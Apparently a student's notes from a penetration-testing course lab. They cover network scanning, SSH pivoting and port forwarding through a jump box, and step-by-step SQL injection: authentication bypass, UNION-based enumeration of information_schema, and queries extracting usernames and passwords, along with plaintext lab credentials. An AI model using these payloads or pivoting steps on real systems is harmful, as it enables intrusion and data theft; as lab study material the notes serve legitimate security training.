OSCP course - pen test gold standard certification
MY LINUX IP - 10.50.179.45
98/103

USERNAME: JUDU-021-M
PASSWORD: fawskB5s0FnC
JUMP-BOX IP: 10.50.16.38
CTFD SERVER: http://10.50.178.176:8000/
xfreerdp /v:127.0.0.1:YYYY /u:student /p:password /size:1920x1000 +clipboard


**SCANNING AND RECONNAISSANCE**
- LIN-OPS: ssh -MS /tmp/jump student@10.50.16.38
- JUMP: for i in {97..126}; do (ping -c 1 192.168.28.$i | grep "bytes from" &); done
        
        64 bytes from 192.168.28.97: icmp_seq=1 ttl=64 time=0.192 ms
        64 bytes from 192.168.28.100: icmp_seq=1 ttl=63 time=1.68 ms
        64 bytes from 192.168.28.105: icmp_seq=1 ttl=63 time=1.86 ms
        64 bytes from 192.168.28.111: icmp_seq=1 ttl=63 time=1.72 ms
        64 bytes from 192.168.28.120: icmp_seq=1 ttl=63 time=2.03 ms

- LIN-OPS: ssh -S /tmp/jump jump -O forward -D9050
       
        Nmap scan report for 192.168.28.100
        Host is up (0.00094s latency).
        Not shown: 998 closed ports
        PORT     STATE SERVICE
        80/tcp   open  http ## VERIFIED HTTP
        2222/tcp open  EtherNetIP-1 ## VERIFIED SSH 

        Nmap scan report for 192.168.28.105
        Host is up (0.00086s latency).
        Not shown: 997 closed ports
        PORT     STATE SERVICE
        21/tcp   open  ftp ## VERIFIED FTP
        23/tcp   open  telnet ## VERIFIED TELNET
        2222/tcp open  EtherNetIP-1 ## VERIFIED SSH

        Nmap scan report for 192.168.28.111
        Host is up (0.0015s latency).
        Not shown: 997 closed ports
        PORT     STATE SERVICE
        80/tcp   open  http
        2222/tcp open  EtherNetIP-1
        8080/tcp open  http-proxy

- proxychains nc 192.168.28.100 80 ##VERIFIY ALL PORTS/HOSTS

## SET UP PORT FORWARDING
- ssh -S /tmp/jump jump -O forward -L 1111:192.168.28.100:80 -L 1112 192.168.28.100:2222 -L 2111:192.168.28.105:2222

- ssh -S /tmp/jump jump -O cancel -L 1111:192.168.28.100:80
        (if error, ss -ntlp)

######################################################################################################################

- ssh -MS /tmp/t1 username@127.0.0.1 -p 1112
- for i in {129..158}; do (ping -c 1 192.168.28.$i | grep "bytes from" &); done
- ssh -S /tmp/jump jump -O cancel -D9050 ##CANCELLING OLD DYNAMIC JUMP SOCKET
- ssh -S /tmp/t1 t1 -O forward -D9050
- proxychains nmap 192.168.28.150,128
- proxychains nc 192.168.150.128 80
- proxychains nc 192.168.150.128 22
- ssh -S /tmp/t1 t1 -O forward -L 3111:192.168.150.128:80 -L 3112 192.168.150.128:22 
- ssh -MS /tmp/t2 username@127.0.0.1 -p 3112

ls -l /usr/share/nmap/scripts | grep nse
proxychains nmap --script=http-enum 192.168.28.100

#########################################################################################################################
#                                                      DAY 3                                                            # 
#                                          SQL: STRUCTURED QUERY LANGUAGE                                               #                                                                                                                #
#########################################################################################################################
------------------------------------------------
https://www.w3schools.com/SQL/sql_syntax.asp
------------------------------------------------

***********************--DEMO - SQL INJECTION--********************************************************
                         AUTHENTICATION BYPASS

ssh demo1@10.50.15.172 -L 1111:10.208.50.61:80
> Username: 'OR 1='1
> Password: 'OR 1='1

OR

F12 > Network Tab
> Username: 'OR 1='1
> Password: 'OR 1='1
Click Method: Post > Request on Right Pane > Toggle Raw data
Copy, add to url as a variable by adding a ?
********************************************************************************************************

****************************--DEMO - DATABASE INTERACTIONS--********************************************
mysql
##GOLDEN STATEMENT
select table_schema,table_name,column_name from information_schema.columns ;
       <NAME OF COLUMN>,<NAME OF COLUMN>,<NAME OF COLUMN> from <NAME OF DATABASE>.<NAME OF TABLE>
use information_schema ;
show.tables ;
show columns from columns ;
                     ^
                   table
select tireid,name,size from session.Tires ;
select username,passwd from session.userinfo ;
select carid,size,type,cost,color,year from session.car ;
select Audi' UNION SELECT 1,2,3,4 #  ## ERROR
select Audi' UNION SELECT 1,2,3,4,5 #
********************************************************************************************************

*************************************-- POST METHOD --**************************************************
## 1. Identify vulnerable field //selection
Ford' OR 1-'1 ## Not vulnerable
..
..
Audi' OR 1='1 ## Vulnerable

## 2. Identify number of columns/selections
Audi' UNION SELECT 1,2,3,4,5 #

## 3. Modify Golden Statement
Audi' UNION SELECT table_schema,2,table_name,column_name,5 from information_schema.columns #

## 4. Craft Queries
Audi' UNION SELECT tireid,2,name,size,cost from session.Tires #
***********************************************************************************************************

********-- GET METHOD --***********************************************************************************
1. Identify vulnerable fields/selection
Selection=1 OR 1-1 ##Not vulnerable
Selection=2 OR 1=1 Vulnerable (2,3,4 all vulnerable)

##2. Identify number of columns
Selection=2 UNION SELECT 1,2,3 ## Displayed 1,3,2

##3. Modify golden statement
Selection=2 UNION SELECT table_schema,column_name,table_name from information_schema.columns

##4. Craft Queries 
Selection=2 UNION SELECT start,status, last_access from session.session_log
Selection=2 UNION SELECT id,name,pass from session.user
***********************************************************************************************************
                                 vvvvv Random shit that will apparently gt me a CTF vvvvv
php?key=<value> || UNION SELECT 1,column_name,3 from information_schema.columns where table_name = 'members'

UNION SELECT 1,2,@@version - extract version number

UNION SELECT 1,table_name,3 from information_schema.tables where table+schema=database()

##DEFAULT DATABASES
information_schema
performance_schema
mysql


CTF NOTES--------------------------------------------------
10.100.28.48: Donovian-nla
80
4444

http://127.0.0.1:11201/cases/productsCategory.php?category=1%20UNION%20SELECT%20table_schema,column_name,table_name%20from%20information_schema.columns

username=%27OR+1%3D%271&password=%27OR+1%3D%271&submit=Login











